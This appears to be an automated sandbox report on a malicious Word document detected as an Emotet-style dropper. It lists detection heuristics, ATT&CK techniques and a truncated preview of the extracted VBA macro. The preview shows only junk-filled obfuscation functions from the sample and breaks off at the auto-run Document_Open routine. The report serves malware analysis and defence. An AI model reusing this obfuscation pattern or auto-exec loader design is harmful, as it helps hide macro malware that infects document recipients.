MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits critical heuristic firings for an obfuscated auto-exec VBA loader. The presence of a Document_Open macro and GetObject calls further indicates malicious intent. The VBA script is heavily obfuscated, but its structure suggests it acts as a loader for a second-stage payload, likely involving execution via GetObject and Shell functions.
Heuristics 7
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45550 bytes |
SHA-256: 8744264c7eac95071fc874819d567297c8e30e8fb71f5cda20d52824a8ab9262 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function nsvjBH(zUCtERL As String) As String
fYJCbiiC = RTrim("^o[U^ pY(QqVgry")
jUlyyf = RTrim("$LrtnsuBk.#as^")
qYFqyTsG = RTrim("S-N@gimtV#$Alo&H")
qYFqyTsG = Left("lWUfIkKVelbq)EYsMg&", 5)
fYJCbiiC = Left("i!YvR]HncYF", 4)
forNiuNA = Space(12)
vMNNK = "RBdiO_RiG&^LQ" + "LxcvGTLbituRpptX_" + "@UaaHy%UVB^iaNiX&"
forNiuNA = Right("KRw@^o-Fbx", 5)
vMNNK = LTrim("v&vf$Gf U(")
vMNNK = Space(15)
xYjfHVH = "#dqRuRbT] aTcj" + "lbV[p$?JEe]_r@hW*nIe" + "XU-DGD%pQVIx"
qYFqyTsG = RTrim("ksP?[stRtWtvv$bY")
fYJCbiiC = UCase("sgKBCHZvLNsNlg)")
qYFqyTsG = 1030 - 245 - 1743
jUlyyf = LTrim("?H)SZb]?N#qb")
vMNNK = Space(4)
mKWTsp = Right("yQ$%pW*nSvwEU@%", 2)
qYFqyTsG = "TpIuxaO&aKCgOe@CF" + "VVGmZB(^[y$fDGJ" + "ERU.wpWQk&d&x%B#h"
vMNNK = 1253 + 657 + 186
pGIEH = RTrim("%uJd@ yu(Me")
jUlyyf = Left("E(h*I^j[Q?ZDJMNAc", 4)
While Cdoxre < 273
jUlyyf = LTrim("@]U.cNCqygxB^ T!Jsz")
forNiuNA = Right("P!ZqE_mwhuBDzp@", 3)
xYjfHVH = "jx?)SjHXA!]Lgd?" + "&Vl?Hj% Ib" + "Auu-x*muUZ*mpi"
xYjfHVH = UCase("Ym!%*HwY$XDKwlp")
Cdoxre = Cdoxre + 3
Wend
forNiuNA = Left(".v!Y@[aEnF!", 4)
qYFqyTsG = StrReverse("@gFpmEjlTWw")
xYjfHVH = Right("Gul^NfD%FALnkOAT", 5)
forNiuNA = 456 + 938 + 1053
vMNNK = StrReverse("r#HpSLpGMayCCSdSG")
mKWTsp = StrReverse("uoDE!qOSPGA(")
pGIEH = UCase("Fp(e*vkaMlWiG")
fYJCbiiC = Space(3)
vMNNK = "Z#-.uVm@$bGX&Ia" + "fkGH#Wa[w-MYjyInybph" + "[J.I*gURg^@ZD PXPo@w"
xYjfHVH = RTrim("v^#-kfrRrP")
jUlyyf = LTrim("hAuk I_#[[^l]")
nsvjBH = "GJQUhZyVdkpSWXjaQLpzoEOLpJWnqvzNz"
End Function
Private Function dnkAhr(FfTNyE As Integer, ptrLyz As Boolean) As String
pGIEH = UCase("pw]wPAw i^Dg*")
qYFqyTsG = Space(16)
mKWTsp = StrReverse("Su#ErZYPrgci FgJ%X")
forNiuNA = RTrim("hyEOJ[_m%zeA?LVj#")
pGIEH = 1245 - 564 - 439
jUlyyf = Right(" !*lkFrmfgCD]", 4)
vMNNK = 241 - 1536 - 1361
For GjrkvB = 0 To 39
pGIEH = Right("^yPdGCnD@e%sMV$Z.", 2)
mKWTsp = Left("-H*J)i mfeD-", 3)
fYJCbiiC = StrReverse("_weC TmnuQzOr")
Next GjrkvB
vMNNK = Space(19)
forNiuNA = UCase(".ddd[PMY*glW")
forNiuNA = Space(10)
qYFqyTsG = "m#DCe(Ps(DmP dTbj" + "wRdex^RmGkl" + "P&yo*CkEwXbz(ss#fy"
qYFqyTsG = UCase("zuKSrKNR$DBx? _SMWrN")
xYjfHVH = Space(18)
mKWTsp = 1351 + 861 + 1791
vMNNK = Left("kautlxommMRp@", 2)
pGIEH = 964 + 1999 + 1364
pGIEH = RTrim("mZ.Tk JKV#ZE^")
xYjfHVH = Right("jQ(yjU.yu&fMe", 4)
For STZrDA = 0 To 35
jUlyyf = UCase("EXelXlx(IVu")
pGIEH = StrReverse("QEkd#%NDnU")
mKWTsp = 229 - 1404 - 1001
Next STZrDA
xYjfHVH = 1976 + 1240 + 1130
fYJCbiiC = LTrim("QHztGBKj)yp(U(.LA")
vMNNK = UCase("eyW!soi^!zMSt")
fYJCbiiC = LTrim("@PC@CV)cVKE[nsZ@H")
fYJCbiiC = LTrim("fXK$fScjNZDQxeMgH")
While zMWiGo < 399
jUlyyf = 1144 + 1454 + 273
qYFqyTsG = LTrim("miyzbZTz(odXVzyXF")
mKWTsp = StrReverse("H. U.jWPju*mLp.n")
forNiuNA = Right("Eatg&B-uq]pSt", 4)
qYFqyTsG = StrReverse("cs!%Kjyedfg?dWUUa")
mKWTsp = 1825 + 145 + 1318
fYJCbiiC = "csQODoPy!sqnn#u.E" + "Laq)Bd#Q!*NVIu#yEWTy" + "$c[@Ak fFI^DCp"
zMWiGo = zMWiGo + 1
Wend
jUlyyf = LTrim("haxUQIXs#V@a?")
qYFqyTsG = 1457 - 688 - 1425
forNiuNA = 546 + 288 + 1589
qYFqyTsG = 166 + 1517 + 400
jUlyyf = Space(8)
jUlyyf = StrReverse("lRNbi.DDI[QCV-N")
mKWTsp = 860 + 1571 + 1898
jUlyyf = Space(9)
jUlyyf = 1555 + 460 + 961
dnkAhr = "DTDOkiPAChVAYdZAuNtkcWEYwwWOoImnwKK"
End Function
Private Sub Document_Open()
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.